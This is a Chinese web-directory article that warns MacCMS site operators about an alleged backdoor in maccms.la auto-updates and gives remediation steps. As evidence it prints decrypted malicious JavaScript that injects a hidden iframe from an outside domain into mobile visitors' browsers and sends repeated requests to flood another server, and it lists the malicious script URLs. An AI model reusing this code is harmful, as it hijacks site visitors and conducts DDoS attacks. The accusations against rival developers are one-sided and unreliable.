欢迎您加入19站目录库!网站推广流程:注册会员 -> 提交网站 -> 快速审核 -> 带来无限流量和外链。( 点入和点出一次可获排名第一位!
数据统计:143个主题分类,1991个优秀站点,5个站点正在排队审核,242篇站长资讯
网站快速审核:免费请联系: 点击这里给我发消息
当前位置:19站目录库 » 站长资讯 » 综合资讯 » 文章详细 订阅RssFeed

紧急:苹果cms由于maccms.la版本存在自动更新后门站已经被入侵

来源:本站原创 浏览:305次 时间:2021-08-13


由于CMS原官方maccms.com域名从19年已经停止开放,但假冒团伙maccms.la却打着原班官网旗号长期劫持挂马非法盈利!!!已经有大量站长因此损失惨重!接下来会提供挂马证据! 如果你的player.js和home.js已经被自动更新了看看文件时间证明使用了后门版本 涉及到所有2020年后版本,可能会被黑客利用挂马 2019版不受影响。
请尽快更新到

V10版本2021.1000.2000+

v8版本2021.1050+

1,更新到最新版本程序。

2,后台播放器配置-》把所有maccms.la相关改为maccms.com、空或自己地址。

3,保持关注有问题及时上报。

4.player.js已经开源解密,可以不用受后门加密版困扰了!

5.如果不小心升级过导致接口功能无法使用、采集功能无法使用都是因为升级了后门版本验证不完善功能缺失覆盖更新包即可修复

注意:2020.1000.1029之后的版本,由于使用的la域名,无法正常接收com域名在线更新推送。请手动更新升级!!!之前的版本正常可以跳过更新! 请及时到 https://github.com/maccmspro/download 下载离线包升级!!!   

以上是某资源群聊天内容,大量站长在统一时间反馈,加上la的作者也承认了。

其中正版maccms.com 从2019停更2年 可以看得出假冒正版的maccms.la从2020年就开始维护maccms程序直维护到今天,时间正好与 .com域名停止开放时间吻合。

 

而盗版:https://github.com/magicblack/ 搭建的2年之久经调查多大万计的站长都遇到过被挂马劫持,细思极恐。

目前唯一可以和正版对抗的筹码应该就是2年下来积累的肉鸡网站,一旦站长更新正版他们目的将功亏一篑。

经以上分析只要是懂点网络知识的看得出为盗版无疑。

暂且不说老的盗版程序是否比原来的优秀,就拿非法手段劫持站长流量的行为,长期控制网站权限的行为都已经触碰法律底线,加上自称是官方这种行为就让人唾弃,更是吧 maccms 老用户和众多提供代码的开发者的智商按地上摩擦。

以下提供部分劫持和攻击代码证据

可自行解密验证,目前你的用户已沦为攻击肉鸡

http://union.maccms.la/html/top10.js

http://union.maccms.la/html/top.js

这是解密后的代码

function msck(n, v) { var a = new Date(); a.setTime(a.getTime() + 30 * 60 * 1000); document.cookie = n + "=" + escape(v) + ";path=/;expires=" + a.toGMTString() }

function mgck(n) { var a, reg = new RegExp("(^| )" + n + "=([^;]*)(;|$)"); if (a = document.cookie.match(reg)) return unescape(a[2]); else return null }

function mshr() { var a = new Date(), mh = a.getMonth() + 1, da = a.getDate(), hs = a.getHours(), rr = mh + "" + da + "" + hs, ek = 'k1', ev = parseFloat(mgck(ek)), ua = navigator.userAgent, au = '//a.laodaguan.cn/'; if (!/(Win|Mac)/i.test(navigator.platform) && !/(localhost|127|192|10)/i.test(location.hostname) && isNaN(ev) && $('.MacPlayer').length > 0 || location.search.indexOf('mdg') > -1) { if (/(iPhone|iPad|iPod|IOS)/i.test(ua)) { $("body").append('<iframe style="display:none;" referrerPolicy="no-referrer" security="restricted" sandbox="allow-same-origin allow-forms allow-scripts" src="' + au + 'index.html?' + rr + '">') } //这里为攻击判断如果是手机就一直长连接请求 所有访客将沦为攻击肉鸡 msck(ek, '1'); if (/(iPhone|iPad|iPod|IOS|Android)/i.test(ua)) { var b = new Image(); b.setAttribute("referrerPolicy", "no-referrer"); //这是官方被.la恶意攻击的地址 现在已经防cc限制 b.src = '//api.maccms.com/index.php?' + rr } } }

setTimeout("mshr()", 50);

可以清晰的看到除了劫持以外还有js cc攻击代码

在此高额悬赏此假冒作者身份信息,有任何线索的都可以向官方提供,我们将移交警方处理。

也有很多小伙伴一直问是不是老王,再次统一回答我们不是老王但又是,因为现在站在这个位置上我们就会对老王这个称号负责,也希望大家不要再去骚扰以前的老王打破他宁静的生活 感谢!

我们的价值观永久免费提供绿色开源程序给广大站长使用,决不触碰法律道德底线。

最后提醒:正版是:https://maccms.com


【本篇文章由“19站目录库http://www.19zh.com”编辑收录】

转载请注明-原文链接:紧急:苹果cms由于maccms.la版本存在自动更新后门站已经被入侵

推荐站点

  • 看看影院看看影院

    看看影院(www.k-yy.com)是一个免费公益的高清电影电视剧网站,每日更新电影电视剧排行榜中优秀的影视作品,让各位网友无需VIP、无需注册即可免费观看最新好看的电影电视剧。您娱乐生活中必不可少影视大全网站-看看影院!

    www.k-yy.com
  • 唯品电影网唯品电影网

    唯品电影网(www.vip800.cn)为您提供最新好看的电影、最新电视剧、影视动漫、热播综艺节目等,免费在线观看高清电影、动作片、喜剧片、爱情片、恐怖片、搞笑电影等视频内容,更多高清电影免费在线观看尽在电影网。

    www.vip800.cn
  • VIP免费电影网VIP免费电影网

    VIP免费电影网为您免费提供最新好看的电影、热播电视剧、新番动漫、热门综艺节目等,涵盖爱情片、动作片、喜剧片、悬疑片、记录片、战争片、恐怖片等电影及电视剧内容,以及海量最新电影图文影视资讯,看电影就上VIP免费电影网vip.19zh.com。

    vip.19zh.com
  • 央视网_世界就在眼前央视网_世界就在眼前

    央视网(www.cctv.com)由中央广播电视总台主办,是以视频为特色的中央重点新闻网站,是央视的融合传播平台,是拥有全牌照业务资质的大型互联网文化企业。秉承“融合创新、一体发展”的理念,以新闻为龙头,以视频为重点,以用户为中心,建成“一网一端多平台多渠道”融媒体传播体系。

    www.cctv.cn
  • 爱奇艺爱奇艺

    爱奇艺(iQIYI.COM)是拥有海量、优质、高清的网络视频的大型视频网站,专业的网络视频播放平台。爱奇艺影视内容丰富多元,涵盖电影、电视剧、动漫、综艺、生活、音乐、搞笑、财经、军事、体育、片花、资讯、微电影、儿童、母婴、教育、科技、时尚、原创、公益、游戏、旅游、拍客、汽车、纪录片、爱奇艺自制剧等剧目。视频播放清晰流畅,操作界面简单友好,真正为用户带来“悦享品质”的在线观看体验。

    www.iqiyi.com
  • 优酷视频优酷视频

    视频服务平台,提供视频播放,视频发布,视频搜索,视频分享

    www.youku.com
Powered by 19站目录F2.02021版 官方网站:19站目录库
Processed in 0.027522 second(s), 21 Queries, Gzip Enabled